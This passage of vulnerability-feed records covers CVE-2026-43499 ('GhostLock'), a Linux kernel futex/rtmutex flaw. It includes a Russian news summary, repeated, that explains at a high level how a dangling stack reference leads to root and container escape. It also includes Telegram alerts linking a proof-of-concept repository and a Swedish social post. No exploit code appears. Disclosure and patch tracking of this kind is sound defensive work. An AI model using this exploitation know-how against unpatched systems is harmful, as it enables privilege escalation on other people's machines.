\u043f\u0440\u0435\u0436\u0434\u0435 \u0447\u0435\u043c \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u0433\u043e\u0434\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2026-43499 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 GhostLock. \u041e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u043c \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u0430\u0432 root \u0438 \u0432\u044b\u0445\u043e\u0434\u0430 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432.\n\n\u0417\u0430 \u0435\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Nebula Security \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0432\u043e\u0437\u043d\u0430\u0433\u0440\u0430\u0436\u0434\u0435\u043d\u0438\u0435 \u0432 \u0440\u0430\u0437\u043c\u0435\u0440\u0435 92 337 \u0434\u043e\u043b\u043b. \u043f\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435 kernelCTF \u043e\u0442 Google.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Nebula, \u043e\u0448\u0438\u0431\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0441 \u0437\u0430\u044f\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u044c\u044e \u0443\u0441\u043f\u0435\u0445\u0430 \u0432 97%. GhostLock \u0431\u044b\u043b \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0432 Linux 2.6.39 \u0432 2011 \u0433\u043e\u0434\u0443 \u0438 \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0441\u044f \u0432 \u044f\u0434\u0440\u0435 \u0434\u043e \u0442\u0435\u0445 \u043f\u043e\u0440, \u043f\u043e\u043a\u0430 \u043d\u0435 \u0431\u044b\u043b \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d \u0432 Linux 7.1, \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0432 \u0432\u0441\u0435 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b.\n\nGhostLock \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043e\u0439 \u0432 \u043a\u043e\u0434\u0435 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u043c\u044c\u044e\u0442\u0435\u043a\u0441\u0430 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 (rtmutex) \u044f\u0434\u0440\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u043c \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u043c \u043d\u0430\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0440\u0438\u043e\u0440\u0438\u0442\u0435\u0442\u043e\u0432 futex.\n\n\u0418\u0437-\u0437\u0430 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u043e\u0447\u0438\u0441\u0442\u043a\u0438 \u044f\u0434\u0440\u043e \u043c\u043e\u0436\u0435\u0442 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0442\u044c \u0432\u0438\u0441\u044f\u0447\u0443\u044e \u0441\u0441\u044b\u043b\u043a\u0443 \u043d\u0430 \u043f\u0430\u043c\u044f\u0442\u044c \u0432 \u0441\u0442\u0435\u043a\u0435 \u043f\u043e\u0442\u043e\u043a\u0430 \u0434\u0430\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u044d\u0442\u0430 \u043f\u0430\u043c\u044f\u0442\u044c \u043f\u0435\u0440\u0435\u0441\u0442\u0430\u0435\u0442 \u0431\u044b\u0442\u044c \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439.\n\n\u0417\u0430\u0442\u0435\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u043e\u0441\u0432\u043e\u0431\u043e\u0434\u0438\u0442\u044c \u044d\u0442\u0443 \u043f\u0430\u043c\u044f\u0442\u044c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445, \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0432 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u044f\u0434\u0440\u0430 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 root.\n\n\u0425\u043e\u0442\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 Nebula Security \u043e\u0441\u043d\u043e\u0432\u0430\u043d \u043d\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043f\u0435\u0440\u0435\u0434\u043e\u0432\u044b\u0445 \u043c\u0435\u0442\u043e\u0434\u0430\u0445 \u043e\u0431\u0445\u043e\u0434\u0430 \u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0437\u0430\u0449\u0438\u0442\u044b \u044f\u0434\u0440\u0430 \u0438 \u043d\u0430\u0434\u0435\u0436\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u044f\u0434\u0440\u0430, \u043b\u0435\u0436\u0430\u0449\u0430\u044f \u0432 \u0435\u0433\u043e \u043e\u0441\u043d\u043e\u0432\u0435 \u043e\u0448\u0438\u0431\u043a\u0430 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u0430.\n\n\u0412\u0441\u043f\u043e\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f, \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u0430\u044f \u0434\u043b\u044f \u043e\u0434\u043d\u043e\u0433\u043e \u043f\u0443\u0442\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f, \u043f\u043e\u0437\u0436\u0435 \u0431\u044b\u043b\u0430 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0432 \u0434\u0440\u0443\u0433\u043e\u043c, \u0433\u0434\u0435 \u043e\u043d\u0430 \u043e\u0448\u0438\u0431\u043e\u0447\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u043b\u0430 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0449\u0435\u0433\u043e\u0441\u044f \u043f\u043e\u0442\u043e\u043a\u0430 \u0432\u043c\u0435\u0441\u0442\u043e \u043f\u043e\u0442\u043e\u043a\u0430, \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u0444\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u043b \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0439 \u043e\u0431\u044a\u0435\u043a\u0442 \u044f\u0434\u0440\u0430.\n\n\u041f\u043e \u0441\u043b\u043e\u0432\u0430\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0434\u043b\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 GhostLock \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u044e\u0442\u0441\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438, \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430 \u0438\u043c\u0435\u043d \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u043b\u0438 \u043d\u0435\u043e\u0431\u044b\u0447\u043d\u044b\u0435 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u044f\u0434\u0440\u0430.\n\n\u0421\u0438\u0441\u0442\u0435\u043c\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u0430, \u0435\u0441\u043b\u0438 \u0432 \u043d\u0435\u0439 \u0432\u043a\u043b\u044e\u0447\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 CONFIG_FUTEX_PI, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u043c \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0432 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0435 \u0443\u043d\u0438\u0432\u0435\u0440\u0441\u0430\u043b\u044c\u043d\u044b\u0445 \u044f\u0434\u0435\u0440 Linux.\n\n\u041e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u044f\u0434\u0440\u0430 Linux \u0443\u0432\u0435\u0434\u043e\u043c\u0438\u043b\u0438 18 \u0430\u043f\u0440\u0435\u043b\u044f 2026 \u0433\u043e\u0434\u0430 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u043f\u0440\u0435\u0434\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c. \u0414\u0440\u0443\u0433\u043e\u0439 \u043f\u0430\u0442\u0447, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0449\u0438\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u0431\u044b\u043b \u043f\u0440\u0438\u043d\u044f\u0442 \u0434\u0432\u0430 \u0434\u043d\u044f \u0441\u043f\u0443\u0441\u0442\u044f, \u0438 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u043c\u0430\u044f \u043d\u0430\u0447\u0430\u043b\u043e\u0441\u044c \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u044f\u0434\u0440\u0430.\n\nGoogle \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0430 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0435 \u0443\u0447\u0430\u0441\u0442\u0438\u0435 Nebula Security \u0432 kernelCTF 30 \u0438\u044e\u043d\u044f, \u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0441\u0432\u043e\u0439 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043e\u0442\u0447\u0435\u0442 \u043f\u043e\u0441\u043b\u0435 \u0441\u043a\u043e\u043e\u0440\u0434\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.\n\n\u041e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0433\u0430\u0440\u0430\u043d\u0442\u0438\u0440\u0443\u0435\u0442, \u0447\u0442\u043e \u044f\u0434\u0440\u043e \u043e\u0447\u0438\u0449\u0430\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0438 \u0434\u043b\u044f \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e\u0439 \u0437\u0430\u0434\u0430\u0447\u0438 \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044f \u00ab\u0432\u0438\u0441\u044f\u0447\u0438\u0439\u00bb \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442.\n\nNebula Security \u0442\u0430\u043a\u0436\u0435 \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u0442\u0430\u043a\u0438\u0445 \u0444\u0443\u043d\u043a\u0446\u0438\u0439 \u0437\u0430\u0449\u0438\u0442\u044b, \u043a\u0430\u043a RANDOMIZE_KSTACK_OFFSET, \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043d\u0438\u0436\u0430\u0435\u0442 \u043d\u0430\u0434\u0435\u0436\u043d\u043e\u0441\u0442\u044c \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0435\u044e \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u0445\u043e\u0442\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u043d\u043e\u0433\u043e \u044f\u0434\u0440\u0430 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u043c \u043f\u043e\u043b\u043d\u044b\u043c \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c \u0437\u0430\u0449\u0438\u0442\u044b.\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u043c Linux \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u044f\u0434\u0440\u0430, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0435 \u0438\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u043c, \u043a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u043e\u043d\u0438 \u0441\u0442\u0430\u043d\u0443\u0442 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b.\n\n\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 GhostLock \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430, \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0438 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u0435 \u044f\u0434\u0440\u0430 \u0432 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u043c \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0438 \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u044b\u043c\u0438 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430\u043c\u0438 \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.", "creation_timestamp": "2026-07-17T12:00:05.796615Z"}, {"uuid": "eee8b42d-9291-4cb8-8b00-6caf4572e540", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93852", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43499-S25U\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a BuSung-dev\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 14  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 2\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-17 14:55:29\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nStandalone CVE-2026-43499 PoC for Galaxy S25 Ultra SM-S938N S938NKSUACZF1\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-17T16:00:04.363533Z"}, {"uuid": "9cf6eac8-7103-48e0-9c13-071c7e6e4dba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/web.www.haxette.se.ap.brid.gy/post/3mquj4grex2l2", "content": "Ett AI-drivet analysverktyg har hittat en allvarlig s\u00e5rbarhet i Linux-k\u00e4rnan som legat ouppt\u00e4ckt i omkring 15 \u00e5r. Buggen, som f\u00e5tt namnet GhostLock och beteckningen CVE-2026-43499, g\u00f6r att vilken inloggad anv\u00e4ndare som helst kan ta full kontroll (root) \u00f6ver en opatchad dator, utan s\u00e4rskilda [\u2026]", "creation_timestamp": "2026-07-17T19:43:21.393597Z"}, {"uuid": "5149a535-28d1-46a0-b48b-203aeb3f6d87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/93852", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43499-S25U\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a BuSung-dev\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 14  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 2\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-07-17 14:55:29\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nStandalone CVE-2026-43499 PoC for Galaxy S25 Ultra SM-S938N S938NKSUACZF1\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-07-18T00:00:27.797410Z"}, {"uuid": "339e6df2-b6dc-4baa-9110-3b9f63b4d8ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "published-proof-of-concept", "source": "Telegram/_qFyWwPBG5YYrYVJCuvS8pNkDyhJdlaykHNtl_KVjYImn64", "content": "", "creation_timestamp": "2026-07-18T00:00:33.756471Z"}, {"uuid": "276b940f-a0dc-49c0-bed1-62b233c16fd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://t.me/S_E_Reborn/6477", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u044f\u0434\u0440\u0435 Linux \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0430\u0441\u044c \u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u043e \u0432\u0441\u0435\u0445 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 Linux \u0431\u043e\u043b\u0435\u0435 15 \u043b\u0435\u0442, \u043f\u0440\u0435\u0436\u0434\u0435 \u0447\u0435\u043c \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u0433\u043e\u0434\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2026-43499 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 GhostLock. \u041e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u043c \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u0430\u0432 root \u0438 \u0432\u044b\u0445\u043e\u0434\u0430 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432.\n\n\u0417\u0430 \u0435\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Nebula Security \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0432\u043e\u0437\u043d\u0430\u0433\u0440\u0430\u0436\u0434\u0435\u043d\u0438\u0435 \u0432 \u0440\u0430\u0437\u043c\u0435\u0440\u0435 92 337 \u0434\u043e\u043b\u043b. \u043f\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435 kernelCTF \u043e\u0442 Google.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Nebula, \u043e\u0448\u0438\u0431\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0441 \u0437\u0430\u044f\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u044c\u044e \u0443\u0441\u043f\u0435\u0445\u0430 \u0432 97%. GhostLock \u0431\u044b\u043b \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0432 Linux 2.6.39 \u0432 2011 \u0433\u043e\u0434\u0443 \u0438 \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0441\u044f \u0432 \u044f\u0434\u0440\u0435 \u0434\u043e \u0442\u0435\u0445 \u043f\u043e\u0440, \u043f\u043e\u043a\u0430 \u043d\u0435 \u0431\u044b\u043b \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d \u0432 Linux 7.1, \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0432 \u0432\u0441\u0435 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b.\n\nGhostLock \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043e\u0439 \u0432 \u043a\u043e\u0434\u0435 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u043c\u044c\u044e\u0442\u0435\u043a\u0441\u0430 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 (rtmutex) \u044f\u0434\u0440\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u043c \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u043c \u043d\u0430\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0440\u0438\u043e\u0440\u0438\u0442\u0435\u0442\u043e\u0432 futex.\n\n\u0418\u0437-\u0437\u0430 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 